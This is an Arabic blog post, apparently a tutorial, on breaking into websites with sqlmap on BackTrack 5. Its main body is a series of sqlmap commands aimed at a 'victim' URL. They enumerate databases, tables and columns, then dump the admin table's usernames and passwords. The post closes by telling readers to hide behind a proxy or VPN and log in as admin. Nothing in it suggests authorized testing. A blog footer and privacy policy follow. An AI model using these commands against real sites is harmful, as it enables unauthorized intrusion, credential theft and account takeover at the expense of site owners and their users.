بحث

Responsive Ads Here

إختراق المواقع بإستخدام الباك تراك 5 (sqlmap)

السلام عليكم ورحمة الله وبركاته

اليوم سنقوم بشرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التلقائي الذي يساعدك على الإختراق الموقع بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !


2. الآن العثور على موقع مصاب. (وأيضا لدي موقع مصاب)


3. الآن اكتب هذا الأمر  واضغط على enter. 

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !




حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.

5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.


python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
 

 

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ



8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns 



الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!



الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

ليست هناك تعليقات:

إرسال تعليق

√مدونةكل ما يخصك√

مَرحبًا بِجَمِيِع زُوَّاِر مُدَوَّنَةِ كُل مَا يَخُصُّك أَتَمَنَّى لَكُمْ قضَاءَ وَقْتٍ مُمْتِعٍ مَعَنا لاَ تَنْسُو مُشَارَكَةَ اْلٌمَوَاضِيع مِنْ أَجْلِ تَعْمِيمِ اْلٌفَائِدَةِ وَشُكْرًا لكُمْ

سياسة الخصوصية

سياسة الخصوصية

سياسة الخصوصية لموقع swimo2-fes

نحن نحترم خصوصيتك ونعمل على حماية بياناتك. من خلال زيارتك لمدونتنا، فإنك توافق على الشروط الموضحة في هذه السياسة.

  • نحن لا نجمع أي معلومات شخصية عن الزوار بشكل مباشر.
  • قد تستخدم بعض الخدمات (مثل Google AdSense أو Google Analytics) ملفات تعريف الارتباط (Cookies) لتحسين تجربة المستخدم.
  • نحن لا نشارك أي معلومات مع أطراف ثالثة.
  • قد تحتوي بعض الصفحات على روابط خارجية. لسنا مسؤولين عن محتوى أو سياسة هذه المواقع.
  • يمكنك دائمًا تعطيل ملفات تعريف الارتباط من إعدادات المتصفح الخاص بك.

لأي استفسار حول الخصوصية، يمكنك التواصل معنا عبر نموذج الاتصال في المدونة.

تاريخ التحديث: 5 أغسطس 2025